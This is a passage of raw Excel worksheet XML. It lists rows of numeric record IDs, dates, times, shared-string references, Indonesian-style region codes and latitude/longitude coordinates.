      <c r="W2201" s="5">
        <v>-554282</v>
      </c>
      <c r="X2201" t="s">
        <v>20159</v>
      </c>
      <c r="Y2201" t="str">
        <f t="shared" si="34"/>
        <v>-5.54282,119.93261</v>
      </c>
    </row>
    <row r="2202" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2202">
        <v>192791</v>
      </c>
      <c r="B2202" s="1">
        <v>43995</v>
      </c>
      <c r="C2202" s="2">
        <v>0.36258101851851854</v>
      </c>
      <c r="D2202" t="s">
        <v>22</v>
      </c>
      <c r="E2202" t="s">
        <v>23</v>
      </c>
      <c r="F2202" t="s">
        <v>7376</v>
      </c>
      <c r="G2202" t="s">
        <v>7377</v>
      </c>
      <c r="H2202" t="s">
        <v>26</v>
      </c>
      <c r="I2202" t="s">
        <v>6933</v>
      </c>
      <c r="J2202" t="s">
        <v>6626</v>
      </c>
      <c r="L2202" t="s">
        <v>7378</v>
      </c>
      <c r="M2202">
        <v>7303010004</v>
      </c>
      <c r="N2202">
        <v>7303010</v>
      </c>
      <c r="O2202">
        <v>7303</v>
      </c>
      <c r="P2202">
        <v>73</v>
      </c>
      <c r="Q2202" t="s">
        <v>7370</v>
      </c>
      <c r="R2202" t="s">
        <v>7371</v>
      </c>
      <c r="S2202" t="s">
        <v>7372</v>
      </c>
      <c r="T2202" t="s">
        <v>6630</v>
      </c>
      <c r="U2202" s="5">
        <v>11993220</v>
      </c>
      <c r="V2202" s="5" t="s">
        <v>16412</v>
      </c>
      <c r="W2202" s="5">
        <v>-554254</v>
      </c>
      <c r="X2202" t="s">
        <v>20160</v>
      </c>
      <c r="Y2202" t="str">
        <f t="shared" si="34"/>
        <v>-5.54254,119.93220</v>
      </c>
    </row>
    <row r="2203" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2203">
        <v>192792</v>
      </c>
      <c r="B2203" s="1">
        <v>43995</v>
      </c>
      <c r="C2203" s="2">
        <v>0.50075231481481486</v>
      </c>
      <c r="D2203" t="s">
        <v>22</v>
      </c>
      <c r="E2203" t="s">
        <v>23</v>
      </c>
      <c r="F2203" t="s">
        <v>7379</v>
      </c>
      <c r="G2203" t="s">
        <v>7380</v>
      </c>
      <c r="H2203" t="s">
        <v>26</v>
      </c>
      <c r="I2203" t="s">
        <v>137</v>
      </c>
      <c r="J2203" t="s">
        <v>6626</v>
      </c>
      <c r="M2203">
        <v>7303010003</v>
      </c>
      <c r="N2203">
        <v>7303010</v>
      </c>
      <c r="O2203">
        <v>7303</v>
      </c>
      <c r="P2203">
        <v>73</v>
      </c>
      <c r="Q2203" t="s">
        <v>7381</v>
      </c>
      <c r="R2203" t="s">
        <v>7371</v>
      </c>
      <c r="S2203" t="s">
        <v>7372</v>
      </c>
      <c r="T2203" t="s">
        <v>6630</v>
      </c>
      <c r="U2203" s="5">
        <v>11991330</v>
      </c>
      <c r="V2203" s="5" t="s">
        <v>16413</v>
      </c>
      <c r="W2203" s="5">
        <v>-554765</v>
      </c>
      <c r="X2203" t="s">
        <v>20161</v>
      </c>
      <c r="Y2203" t="str">
        <f t="shared" si="34"/>
        <v>-5.54765,119.91330</v>
      </c>
    </row>
    <row r="2204" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2204">
        <v>192793</v>
      </c>
      <c r="B2204" s="1">
        <v>43996</v>
      </c>
      <c r="C2204" s="2">
        <v>0.59953703703703709</v>
      </c>
      <c r="D2204" t="s">
        <v>22</v>
      </c>
      <c r="E2204" t="s">
        <v>23</v>
      </c>
      <c r="F2204" t="s">
        <v>7382</v>
      </c>
      <c r="G2204" t="s">
        <v>7383</v>
      </c>
      <c r="H2204" t="s">
        <v>26</v>
      </c>
      <c r="I2204" t="s">
        <v>1099</v>
      </c>
      <c r="J2204" t="s">
        <v>2608</v>
      </c>
      <c r="L2204" t="s">
        <v>7384</v>
      </c>
      <c r="M2204">
        <v>3375040006</v>
      </c>
      <c r="N2204">
        <v>3375040</v>
      </c>
      <c r="O2204">
        <v>3375</v>
      </c>
      <c r="P2204">
        <v>33</v>
      </c>
      <c r="Q2204" t="s">
        <v>7385</v>
      </c>
      <c r="R2204" t="s">
        <v>7339</v>
      </c>
      <c r="S2204" t="s">
        <v>6246</v>
      </c>
      <c r="T2204" t="s">
        <v>1134</v>
      </c>
      <c r="U2204" s="5">
        <v>10967580</v>
      </c>
      <c r="V2204" s="5" t="s">
        <v>16414</v>
      </c>
      <c r="W2204" s="5">
        <v>-687672</v>
      </c>
      <c r="X2204" t="s">
        <v>20162</v>
      </c>
      <c r="Y2204" t="str">
        <f t="shared" si="34"/>
        <v>-6.87672,109.67580</v>
      </c>
    </row>
    <row r="2205" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2205">
        <v>192798</v>
      </c>
      <c r="B2205" s="1">
        <v>43998</v>
      </c>
      <c r="C2205" s="2">
        <v>0.64479166666666665</v>
      </c>
      <c r="D2205" t="s">
        <v>85</v>
      </c>
      <c r="E2205" t="s">
        <v>23</v>
      </c>
      <c r="F2205" t="s">
        <v>7386</v>
      </c>
      <c r="G2205" t="s">
        <v>7387</v>
      </c>
      <c r="H2205" t="s">
        <v>26</v>
      </c>
      <c r="J2205" t="s">
        <v>6940</v>
      </c>
      <c r="K2205" t="s">
        <v>7388</v>
      </c>
      <c r="L2205" t="s">
        <v>7389</v>
      </c>
      <c r="M2205">
        <v>1111130018</v>
      </c>
      <c r="N2205">
        <v>1111130</v>
      </c>
      <c r="O2205">
        <v>1111</v>
      </c>
      <c r="P2205">
        <v>11</v>
      </c>
      <c r="Q2205" t="s">
        <v>7390</v>
      </c>
      <c r="R2205" t="s">
        <v>7391</v>
      </c>
      <c r="S2205" t="s">
        <v>7392</v>
      </c>
      <c r="T2205" t="s">
        <v>6945</v>
      </c>
      <c r="U2205" s="5">
        <v>9720327</v>
      </c>
      <c r="V2205" s="5" t="s">
        <v>16415</v>
      </c>
      <c r="W2205" s="5">
        <v>511597</v>
      </c>
      <c r="X2205" t="s">
        <v>20163</v>
      </c>
      <c r="Y2205" t="str">
        <f t="shared" si="34"/>
        <v>5.11597,97.20327</v>
      </c>
    </row>
    <row r="2206" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2206">
        <v>192799</v>
      </c>
      <c r="B2206" s="1">
        <v>43999</v>
      </c>
      <c r="C2206" s="2">
        <v>1.3888888888888888E-2</v>
      </c>
      <c r="D2206" t="s">
        <v>2648</v>
      </c>
      <c r="E2206" t="s">
        <v>23</v>
      </c>
      <c r="G2206" t="s">
        <v>7393</v>
      </c>
      <c r="H2206" t="s">
        <v>26</v>
      </c>
      <c r="J2206" t="s">
        <v>2728</v>
      </c>
      <c r="L2206" t="s">
        <v>7394</v>
      </c>
      <c r="M2206">
        <v>3175040001</v>
      </c>
      <c r="N2206">
        <v>3175040</v>
      </c>
      <c r="O2206">
        <v>3175</v>
      </c>
      <c r="P2206">
        <v>31</v>
      </c>
      <c r="Q2206" t="s">
        <v>7395</v>
      </c>
      <c r="R2206" t="s">
        <v>2063</v>
      </c>
      <c r="S2206" t="s">
        <v>547</v>
      </c>
      <c r="T2206" t="s">
        <v>33</v>
      </c>
      <c r="U2206" s="5">
        <v>10689464</v>
      </c>
      <c r="V2206" s="5" t="s">
        <v>16416</v>
      </c>
      <c r="W2206" s="5">
        <v>-613166</v>
      </c>
      <c r="X2206" t="s">
        <v>20164</v>
      </c>
      <c r="Y2206" t="str">
        <f t="shared" si="34"/>
        <v>-6.13166,106.89464</v>
      </c>
    </row>
    <row r="2207" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2207">
        <v>192814</v>
      </c>
      <c r="B2207" s="1">
        <v>43999</v>
      </c>
      <c r="C2207" s="2">
        <v>0.6239351851851852</v>
      </c>
      <c r="D2207" t="s">
        <v>22</v>
      </c>
      <c r="E2207" t="s">
        <v>23</v>
      </c>
      <c r="F2207" t="s">
        <v>7396</v>
      </c>
      <c r="G2207" t="s">
        <v>7397</v>
      </c>
      <c r="H2207" t="s">
        <v>26</v>
      </c>
      <c r="I2207" t="s">
        <v>7398</v>
      </c>
      <c r="J2207" t="s">
        <v>7399</v>
      </c>
      <c r="L2207" t="s">
        <v>7400</v>
      </c>
      <c r="M2207">
        <v>1471010008</v>
      </c>
      <c r="N2207">
        <v>1471010</v>
      </c>
      <c r="O2207">
        <v>1471</v>
      </c>
      <c r="P2207">
        <v>14</v>
      </c>
      <c r="Q2207" t="s">
        <v>7401</v>
      </c>
      <c r="R2207" t="s">
        <v>7402</v>
      </c>
      <c r="S2207" t="s">
        <v>7403</v>
      </c>
      <c r="T2207" t="s">
        <v>7404</v>
      </c>
      <c r="U2207" s="5">
        <v>10140260</v>
      </c>
      <c r="V2207" s="5" t="s">
        <v>16417</v>
      </c>
      <c r="W2207" s="5">
        <v>47830</v>
      </c>
      <c r="X2207" t="s">
        <v>14441</v>
      </c>
      <c r="Y2207" t="str">
        <f t="shared" si="34"/>
        <v>0.47830,101.40260</v>
      </c>
    </row>
    <row r="2208" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2208">
        <v>192826</v>
      </c>
      <c r="B2208" s="1">
        <v>44000</v>
      </c>
      <c r="C2208" s="2">
        <v>0.47062500000000002</v>
      </c>
      <c r="D2208" t="s">
        <v>22</v>
      </c>
      <c r="E2208" t="s">
        <v>23</v>
      </c>
      <c r="F2208" t="s">
        <v>7405</v>
      </c>
      <c r="H2208" t="s">
        <v>26</v>
      </c>
      <c r="I2208" t="s">
        <v>1080</v>
      </c>
      <c r="J2208" t="s">
        <v>2622</v>
      </c>
      <c r="L2208" t="s">
        <v>7406</v>
      </c>
      <c r="M2208">
        <v>3573010011</v>
      </c>
      <c r="N2208">
        <v>3573010</v>
      </c>
      <c r="O2208">
        <v>3573</v>
      </c>
      <c r="P2208">
        <v>35</v>
      </c>
      <c r="Q2208" t="s">
        <v>7407</v>
      </c>
      <c r="R2208" t="s">
        <v>7408</v>
      </c>
      <c r="S2208" t="s">
        <v>6321</v>
      </c>
      <c r="T2208" t="s">
        <v>1221</v>
      </c>
      <c r="U2208" s="5">
        <v>11266205</v>
      </c>
      <c r="V2208" s="5" t="s">
        <v>16418</v>
      </c>
      <c r="W2208" s="5">
        <v>-797741</v>
      </c>
      <c r="X2208" t="s">
        <v>20165</v>
      </c>
      <c r="Y2208" t="str">
        <f t="shared" si="34"/>
        <v>-7.97741,112.66205</v>
      </c>
    </row>
    <row r="2209" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2209">
        <v>192830</v>
      </c>
      <c r="B2209" s="1">
        <v>44003</v>
      </c>
      <c r="C2209" s="2">
        <v>0.82331018518518517</v>
      </c>
      <c r="D2209" t="s">
        <v>22</v>
      </c>
      <c r="E2209" t="s">
        <v>23</v>
      </c>
      <c r="F2209" t="s">
        <v>7409</v>
      </c>
      <c r="H2209" t="s">
        <v>7086</v>
      </c>
      <c r="I2209" t="s">
        <v>7410</v>
      </c>
      <c r="J2209" t="s">
        <v>2615</v>
      </c>
      <c r="L2209" t="s">
        <v>7411</v>
      </c>
      <c r="M2209">
        <v>3404070001</v>
      </c>
      <c r="N2209">
        <v>3404070</v>
      </c>
      <c r="O2209">
        <v>3404</v>
      </c>
      <c r="P2209">
        <v>34</v>
      </c>
      <c r="Q2209" t="s">
        <v>7412</v>
      </c>
      <c r="R2209" t="s">
        <v>185</v>
      </c>
      <c r="S2209" t="s">
        <v>1855</v>
      </c>
      <c r="T2209" t="s">
        <v>1856</v>
      </c>
      <c r="U2209" s="5">
        <v>11041285</v>
      </c>
      <c r="V2209" s="5" t="s">
        <v>16419</v>
      </c>
      <c r="W2209" s="5">
        <v>-777457</v>
      </c>
      <c r="X2209" t="s">
        <v>20166</v>
      </c>
      <c r="Y2209" t="str">
        <f t="shared" si="34"/>
        <v>-7.77457,110.41285</v>
      </c>
    </row>
    <row r="2210" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2210">
        <v>192831</v>
      </c>
      <c r="B2210" s="1">
        <v>44003</v>
      </c>
      <c r="C2210" s="2">
        <v>0.82489583333333327</v>
      </c>
      <c r="D2210" t="s">
        <v>22</v>
      </c>
      <c r="E2210" t="s">
        <v>23</v>
      </c>
      <c r="F2210" t="s">
        <v>7413</v>
      </c>
      <c r="H2210" t="s">
        <v>7086</v>
      </c>
      <c r="I2210" t="s">
        <v>7414</v>
      </c>
      <c r="J2210" t="s">
        <v>2608</v>
      </c>
      <c r="L2210" t="s">
        <v>7415</v>
      </c>
      <c r="M2210">
        <v>3312130011</v>
      </c>
      <c r="N2210">
        <v>3312130</v>
      </c>
      <c r="O2210">
        <v>3312</v>
      </c>
      <c r="P2210">
        <v>33</v>
      </c>
      <c r="Q2210" t="s">
        <v>7416</v>
      </c>
      <c r="R2210" t="s">
        <v>7417</v>
      </c>
      <c r="S2210" t="s">
        <v>7418</v>
      </c>
      <c r="T2210" t="s">
        <v>1134</v>
      </c>
      <c r="U2210" s="5">
        <v>11089281</v>
      </c>
      <c r="V2210" s="5" t="s">
        <v>16420</v>
      </c>
      <c r="W2210" s="5">
        <v>-775839</v>
      </c>
      <c r="X2210" t="s">
        <v>20167</v>
      </c>
      <c r="Y2210" t="str">
        <f t="shared" si="34"/>
        <v>-7.75839,110.89281</v>
      </c>
    </row>
    <row r="2211" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2211">
        <v>192833</v>
      </c>
      <c r="B2211" s="1">
        <v>44003</v>
      </c>
      <c r="C2211" s="2">
        <v>0.8343287037037036</v>
      </c>
      <c r="D2211" t="s">
        <v>22</v>
      </c>
      <c r="E2211" t="s">
        <v>23</v>
      </c>
      <c r="F2211" t="s">
        <v>7419</v>
      </c>
      <c r="G2211" t="s">
        <v>7420</v>
      </c>
      <c r="H2211" t="s">
        <v>7086</v>
      </c>
      <c r="I2211" t="s">
        <v>7421</v>
      </c>
      <c r="J2211" t="s">
        <v>37</v>
      </c>
      <c r="L2211" t="s">
        <v>7422</v>
      </c>
      <c r="M2211">
        <v>3101010003</v>
      </c>
      <c r="N2211">
        <v>3101010</v>
      </c>
      <c r="O2211">
        <v>3101</v>
      </c>
      <c r="P2211">
        <v>31</v>
      </c>
      <c r="Q2211" t="s">
        <v>7423</v>
      </c>
      <c r="R2211" t="s">
        <v>7424</v>
      </c>
      <c r="S2211" t="s">
        <v>7425</v>
      </c>
      <c r="T2211" t="s">
        <v>33</v>
      </c>
      <c r="U2211" s="5">
        <v>10669201</v>
      </c>
      <c r="V2211" s="5" t="s">
        <v>16421</v>
      </c>
      <c r="W2211" s="5">
        <v>-597420</v>
      </c>
      <c r="X2211" t="s">
        <v>20168</v>
      </c>
      <c r="Y2211" t="str">
        <f t="shared" si="34"/>
        <v>-5.97420,106.69201</v>
      </c>
    </row>
    <row r="2212" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2212">
        <v>192834</v>
      </c>
      <c r="B2212" s="1">
        <v>44003</v>
      </c>
      <c r="C2212" s="2">
        <v>0.83609953703703699</v>
      </c>
      <c r="D2212" t="s">
        <v>22</v>
      </c>
      <c r="E2212" t="s">
        <v>23</v>
      </c>
      <c r="F2212" t="s">
        <v>7426</v>
      </c>
      <c r="H2212" t="s">
        <v>26</v>
      </c>
      <c r="I2212" t="s">
        <v>7285</v>
      </c>
      <c r="J2212" t="s">
        <v>2615</v>
      </c>
      <c r="L2212" t="s">
        <v>7427</v>
      </c>
      <c r="M2212">
        <v>3402150001</v>
      </c>
      <c r="N2212">
        <v>3402150</v>
      </c>
      <c r="O2212">
        <v>3402</v>
      </c>
      <c r="P2212">
        <v>34</v>
      </c>
      <c r="Q2212" t="s">
        <v>7428</v>
      </c>
      <c r="R2212" t="s">
        <v>7429</v>
      </c>
      <c r="S2212" t="s">
        <v>7430</v>
      </c>
      <c r="T2212" t="s">
        <v>1856</v>
      </c>
      <c r="U2212" s="5">
        <v>11030089</v>
      </c>
      <c r="V2212" s="5" t="s">
        <v>16422</v>
      </c>
      <c r="W2212" s="5">
        <v>-783802</v>
      </c>
      <c r="X2212" t="s">
        <v>20169</v>
      </c>
      <c r="Y2212" t="str">
        <f t="shared" si="34"/>
        <v>-7.83802,110.30089</v>
      </c>
    </row>
    <row r="2213" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2213">
        <v>192835</v>
      </c>
      <c r="B2213" s="1">
        <v>44004</v>
      </c>
      <c r="C2213" s="2">
        <v>0.1013888888888889</v>
      </c>
      <c r="D2213" t="s">
        <v>2648</v>
      </c>
      <c r="E2213" t="s">
        <v>23</v>
      </c>
      <c r="G2213" t="s">
        <v>7431</v>
      </c>
      <c r="H2213" t="s">
        <v>26</v>
      </c>
      <c r="J2213" t="s">
        <v>7432</v>
      </c>
      <c r="L2213" t="s">
        <v>7433</v>
      </c>
      <c r="M2213">
        <v>3172030008</v>
      </c>
      <c r="N2213">
        <v>3172030</v>
      </c>
      <c r="O2213">
        <v>3172</v>
      </c>
      <c r="P2213">
        <v>31</v>
      </c>
      <c r="Q2213" t="s">
        <v>5602</v>
      </c>
      <c r="R2213" t="s">
        <v>228</v>
      </c>
      <c r="S2213" t="s">
        <v>49</v>
      </c>
      <c r="T2213" t="s">
        <v>33</v>
      </c>
      <c r="U2213" s="5">
        <v>10689802</v>
      </c>
      <c r="V2213" s="5" t="s">
        <v>16423</v>
      </c>
      <c r="W2213" s="5">
        <v>-628793</v>
      </c>
      <c r="X2213" t="s">
        <v>20170</v>
      </c>
      <c r="Y2213" t="str">
        <f t="shared" si="34"/>
        <v>-6.28793,106.89802</v>
      </c>
    </row>
    <row r="2214" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2214">
        <v>192881</v>
      </c>
      <c r="B2214" s="1">
        <v>44005</v>
      </c>
      <c r="C2214" s="2">
        <v>0.32696759259259262</v>
      </c>
      <c r="D2214" t="s">
        <v>22</v>
      </c>
      <c r="E2214" t="s">
        <v>23</v>
      </c>
      <c r="F2214" t="s">
        <v>7434</v>
      </c>
      <c r="G2214" t="s">
        <v>7435</v>
      </c>
      <c r="H2214" t="s">
        <v>26</v>
      </c>
      <c r="I2214" t="s">
        <v>4261</v>
      </c>
      <c r="J2214" t="s">
        <v>7436</v>
      </c>
      <c r="L2214" t="s">
        <v>7437</v>
      </c>
      <c r="M2214">
        <v>6106040007</v>
      </c>
      <c r="N2214">
        <v>6106040</v>
      </c>
      <c r="O2214">
        <v>6106</v>
      </c>
      <c r="P2214">
        <v>61</v>
      </c>
      <c r="Q2214" t="s">
        <v>7438</v>
      </c>
      <c r="R2214" t="s">
        <v>7439</v>
      </c>
      <c r="S2214" t="s">
        <v>7440</v>
      </c>
      <c r="T2214" t="s">
        <v>7441</v>
      </c>
      <c r="U2214" s="5">
        <v>11081586</v>
      </c>
      <c r="V2214" s="5" t="s">
        <v>16424</v>
      </c>
      <c r="W2214" s="5">
        <v>-194625</v>
      </c>
      <c r="X2214" t="s">
        <v>20171</v>
      </c>
      <c r="Y2214" t="str">
        <f t="shared" si="34"/>
        <v>-1.94625,110.81586</v>
      </c>
    </row>
    <row r="2215" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2215">
        <v>192882</v>
      </c>
      <c r="B2215" s="1">
        <v>44005</v>
      </c>
      <c r="C2215" s="2">
        <v>0.90216435185185195</v>
      </c>
      <c r="D2215" t="s">
        <v>22</v>
      </c>
      <c r="E2215" t="s">
        <v>23</v>
      </c>
      <c r="F2215" t="s">
        <v>7442</v>
      </c>
      <c r="G2215" t="s">
        <v>7443</v>
      </c>
      <c r="H2215" t="s">
        <v>26</v>
      </c>
      <c r="I2215" t="s">
        <v>3029</v>
      </c>
      <c r="J2215" t="s">
        <v>7444</v>
      </c>
      <c r="M2215">
        <v>1702040017</v>
      </c>
      <c r="N2215">
        <v>1702040</v>
      </c>
      <c r="O2215">
        <v>1702</v>
      </c>
      <c r="P2215">
        <v>17</v>
      </c>
      <c r="Q2215" t="s">
        <v>7445</v>
      </c>
      <c r="R2215" t="s">
        <v>3015</v>
      </c>
      <c r="S2215" t="s">
        <v>7446</v>
      </c>
      <c r="T2215" t="s">
        <v>7447</v>
      </c>
      <c r="U2215" s="5">
        <v>10252401</v>
      </c>
      <c r="V2215" s="5" t="s">
        <v>16425</v>
      </c>
      <c r="W2215" s="5">
        <v>-346035</v>
      </c>
      <c r="X2215" t="s">
        <v>20172</v>
      </c>
      <c r="Y2215" t="str">
        <f t="shared" si="34"/>
        <v>-3.46035,102.52401</v>
      </c>
    </row>
    <row r="2216" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2216">
        <v>192883</v>
      </c>
      <c r="B2216" s="1">
        <v>44006</v>
      </c>
      <c r="C2216" s="2">
        <v>0.13472222222222222</v>
      </c>
      <c r="D2216" t="s">
        <v>22</v>
      </c>
      <c r="E2216" t="s">
        <v>23</v>
      </c>
      <c r="F2216" t="s">
        <v>7448</v>
      </c>
      <c r="H2216" t="s">
        <v>26</v>
      </c>
      <c r="I2216" t="s">
        <v>7449</v>
      </c>
      <c r="J2216" t="s">
        <v>6014</v>
      </c>
      <c r="L2216" t="s">
        <v>7450</v>
      </c>
      <c r="M2216">
        <v>3175030003</v>
      </c>
      <c r="N2216">
        <v>3175030</v>
      </c>
      <c r="O2216">
        <v>3175</v>
      </c>
      <c r="P2216">
        <v>31</v>
      </c>
      <c r="Q2216" t="s">
        <v>7451</v>
      </c>
      <c r="R2216" t="s">
        <v>1563</v>
      </c>
      <c r="S2216" t="s">
        <v>547</v>
      </c>
      <c r="T2216" t="s">
        <v>33</v>
      </c>
      <c r="U2216" s="5">
        <v>10685807</v>
      </c>
      <c r="V2216" s="5" t="s">
        <v>16426</v>
      </c>
      <c r="W2216" s="5">
        <v>-612359</v>
      </c>
      <c r="X2216" t="s">
        <v>20173</v>
      </c>
      <c r="Y2216" t="str">
        <f t="shared" si="34"/>
        <v>-6.12359,106.85807</v>
      </c>
    </row>
    <row r="2217" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2217">
        <v>192884</v>
      </c>
      <c r="B2217" s="1">
        <v>44006</v>
      </c>
      <c r="C2217" s="2">
        <v>0.41041666666666665</v>
      </c>
      <c r="D2217" t="s">
        <v>2648</v>
      </c>
      <c r="E2217" t="s">
        <v>23</v>
      </c>
      <c r="G2217" t="s">
        <v>7452</v>
      </c>
      <c r="H2217" t="s">
        <v>26</v>
      </c>
      <c r="J2217" t="s">
        <v>7453</v>
      </c>
      <c r="L2217" t="s">
        <v>7454</v>
      </c>
      <c r="M2217">
        <v>3172050004</v>
      </c>
      <c r="N2217">
        <v>3172050</v>
      </c>
      <c r="O2217">
        <v>3172</v>
      </c>
      <c r="P2217">
        <v>31</v>
      </c>
      <c r="Q2217" t="s">
        <v>2717</v>
      </c>
      <c r="R2217" t="s">
        <v>358</v>
      </c>
      <c r="S2217" t="s">
        <v>49</v>
      </c>
      <c r="T2217" t="s">
        <v>33</v>
      </c>
      <c r="U2217" s="5">
        <v>10688214</v>
      </c>
      <c r="V2217" s="5" t="s">
        <v>16427</v>
      </c>
      <c r="W2217" s="5">
        <v>-630408</v>
      </c>
      <c r="X2217" t="s">
        <v>20174</v>
      </c>
      <c r="Y2217" t="str">
        <f t="shared" si="34"/>
        <v>-6.30408,106.88214</v>
      </c>
    </row>
    <row r="2218" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2218">
        <v>192885</v>
      </c>
      <c r="B2218" s="1">
        <v>44006</v>
      </c>
      <c r="C2218" s="2">
        <v>0.375</v>
      </c>
      <c r="D2218" t="s">
        <v>2648</v>
      </c>
      <c r="E2218" t="s">
        <v>23</v>
      </c>
      <c r="G2218" t="s">
        <v>7455</v>
      </c>
      <c r="H2218" t="s">
        <v>26</v>
      </c>
      <c r="J2218" t="s">
        <v>7456</v>
      </c>
      <c r="L2218" t="s">
        <v>7457</v>
      </c>
      <c r="M2218">
        <v>3171070003</v>
      </c>
      <c r="N2218">
        <v>3171070</v>
      </c>
      <c r="O2218">
        <v>3171</v>
      </c>
      <c r="P2218">
        <v>31</v>
      </c>
      <c r="Q2218" t="s">
        <v>7458</v>
      </c>
      <c r="R2218" t="s">
        <v>121</v>
      </c>
      <c r="S2218" t="s">
        <v>108</v>
      </c>
      <c r="T2218" t="s">
        <v>33</v>
      </c>
      <c r="U2218" s="5">
        <v>10683434</v>
      </c>
      <c r="V2218" s="5" t="s">
        <v>16428</v>
      </c>
      <c r="W2218" s="5">
        <v>-624788</v>
      </c>
      <c r="X2218" t="s">
        <v>20175</v>
      </c>
      <c r="Y2218" t="str">
        <f t="shared" si="34"/>
        <v>-6.24788,106.83434</v>
      </c>
    </row>
    <row r="2219" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2219">
        <v>192910</v>
      </c>
      <c r="B2219" s="1">
        <v>44006</v>
      </c>
      <c r="C2219" s="2">
        <v>0.50627314814814817</v>
      </c>
      <c r="D2219" t="s">
        <v>22</v>
      </c>
      <c r="E2219" t="s">
        <v>23</v>
      </c>
      <c r="F2219" t="s">
        <v>7459</v>
      </c>
      <c r="H2219" t="s">
        <v>26</v>
      </c>
      <c r="I2219" t="s">
        <v>974</v>
      </c>
      <c r="J2219" t="s">
        <v>1656</v>
      </c>
      <c r="L2219" t="s">
        <v>7460</v>
      </c>
      <c r="M2219">
        <v>3173080003</v>
      </c>
      <c r="N2219">
        <v>3173080</v>
      </c>
      <c r="O2219">
        <v>3173</v>
      </c>
      <c r="P2219">
        <v>31</v>
      </c>
      <c r="Q2219" t="s">
        <v>157</v>
      </c>
      <c r="R2219" t="s">
        <v>157</v>
      </c>
      <c r="S2219" t="s">
        <v>62</v>
      </c>
      <c r="T2219" t="s">
        <v>33</v>
      </c>
      <c r="U2219" s="5">
        <v>10682722</v>
      </c>
      <c r="V2219" s="5" t="s">
        <v>16429</v>
      </c>
      <c r="W2219" s="5">
        <v>-617336</v>
      </c>
      <c r="X2219" t="s">
        <v>20176</v>
      </c>
      <c r="Y2219" t="str">
        <f t="shared" si="34"/>
        <v>-6.17336,106.82722</v>
      </c>
    </row>
    <row r="2220" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2220">
        <v>193314</v>
      </c>
      <c r="B2220" s="1">
        <v>44014</v>
      </c>
      <c r="C2220" s="2">
        <v>0.25347222222222221</v>
      </c>
      <c r="D2220" t="s">
        <v>2648</v>
      </c>
      <c r="E2220" t="s">
        <v>23</v>
      </c>
      <c r="G2220" t="s">
        <v>7461</v>
      </c>
      <c r="H2220" t="s">
        <v>26</v>
      </c>
      <c r="J2220" t="s">
        <v>374</v>
      </c>
      <c r="L2220" t="s">
        <v>7462</v>
      </c>
      <c r="M2220">
        <v>3174040005</v>
      </c>
      <c r="N2220">
        <v>3174040</v>
      </c>
      <c r="O2220">
        <v>3174</v>
      </c>
      <c r="P2220">
        <v>31</v>
      </c>
      <c r="Q2220" t="s">
        <v>376</v>
      </c>
      <c r="R2220" t="s">
        <v>377</v>
      </c>
      <c r="S2220" t="s">
        <v>32</v>
      </c>
      <c r="T2220" t="s">
        <v>33</v>
      </c>
      <c r="U2220" s="5">
        <v>10678829</v>
      </c>
      <c r="V2220" s="5" t="s">
        <v>14509</v>
      </c>
      <c r="W2220" s="5">
        <v>-616399</v>
      </c>
      <c r="X2220" t="s">
        <v>18884</v>
      </c>
      <c r="Y2220" t="str">
        <f t="shared" si="34"/>
        <v>-6.16399,106.78829</v>
      </c>
    </row>
    <row r="2221" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2221">
        <v>193326</v>
      </c>
      <c r="B2221" s="1">
        <v>44014</v>
      </c>
      <c r="C2221" s="2">
        <v>0.19097222222222221</v>
      </c>
      <c r="D2221" t="s">
        <v>2648</v>
      </c>
      <c r="E2221" t="s">
        <v>23</v>
      </c>
      <c r="G2221" t="s">
        <v>7463</v>
      </c>
      <c r="H2221" t="s">
        <v>26</v>
      </c>
      <c r="J2221" t="s">
        <v>7464</v>
      </c>
      <c r="L2221" t="s">
        <v>7465</v>
      </c>
      <c r="M2221">
        <v>3174050010</v>
      </c>
      <c r="N2221">
        <v>3174050</v>
      </c>
      <c r="O2221">
        <v>3174</v>
      </c>
      <c r="P2221">
        <v>31</v>
      </c>
      <c r="Q2221" t="s">
        <v>7466</v>
      </c>
      <c r="R2221" t="s">
        <v>2826</v>
      </c>
      <c r="S2221" t="s">
        <v>32</v>
      </c>
      <c r="T2221" t="s">
        <v>33</v>
      </c>
      <c r="U2221" s="5">
        <v>10680884</v>
      </c>
      <c r="V2221" s="5" t="s">
        <v>16430</v>
      </c>
      <c r="W2221" s="5">
        <v>-613169</v>
      </c>
      <c r="X2221" t="s">
        <v>20177</v>
      </c>
      <c r="Y2221" t="str">
        <f t="shared" si="34"/>
        <v>-6.13169,106.80884</v>
      </c>
    </row>
    <row r="2222" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2222">
        <v>193399</v>
      </c>
      <c r="B2222" s="1">
        <v>44014</v>
      </c>
      <c r="C2222" s="2">
        <v>0.5458101851851852</v>
      </c>
      <c r="D2222" t="s">
        <v>22</v>
      </c>
      <c r="E2222" t="s">
        <v>23</v>
      </c>
      <c r="F2222" t="s">
        <v>7467</v>
      </c>
      <c r="G2222" t="s">
        <v>7468</v>
      </c>
      <c r="H2222" t="s">
        <v>26</v>
      </c>
      <c r="I2222" t="s">
        <v>2005</v>
      </c>
      <c r="J2222" t="s">
        <v>2627</v>
      </c>
      <c r="L2222" t="s">
        <v>7469</v>
      </c>
      <c r="M2222">
        <v>3274040004</v>
      </c>
      <c r="N2222">
        <v>3274040</v>
      </c>
      <c r="O2222">
        <v>3274</v>
      </c>
      <c r="P2222">
        <v>32</v>
      </c>
      <c r="Q2222" t="s">
        <v>6531</v>
      </c>
      <c r="R2222" t="s">
        <v>6531</v>
      </c>
      <c r="S2222" t="s">
